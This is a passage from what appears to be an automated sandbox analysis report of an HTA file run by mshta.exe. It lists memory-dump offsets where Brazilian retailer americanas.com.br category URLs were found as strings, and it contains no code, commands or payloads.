00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/telefonia-fixa?chave=pfm_home_telefonia_menu
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411154333.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377868768.000000000ABA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486943615.000000000AAD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409699291.000000000AAD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438886718.0000000009704000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25435995169.0000000009703000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/acessorios-para-tv-e-video?chave=pfm_hm_tt
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/home-theater?chave=pfm_hm_tt_1_0_home-thea
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=l
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv?chave=pfm_hm_tt_1_0_tv
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvs
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_hm_tt_1_0_tv-e-home-theater
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380626853.000000000B733000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379435044.000000000B70A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menu
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menud
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487177460.000000000AB31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB22000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=dk_hm_at_ud
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/vestuario-esportivo?chave=pfm_home_vestuarioesportivo_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/vestuario-esportivo?chave=pfm_home_vestuarioesportivo_menuzU
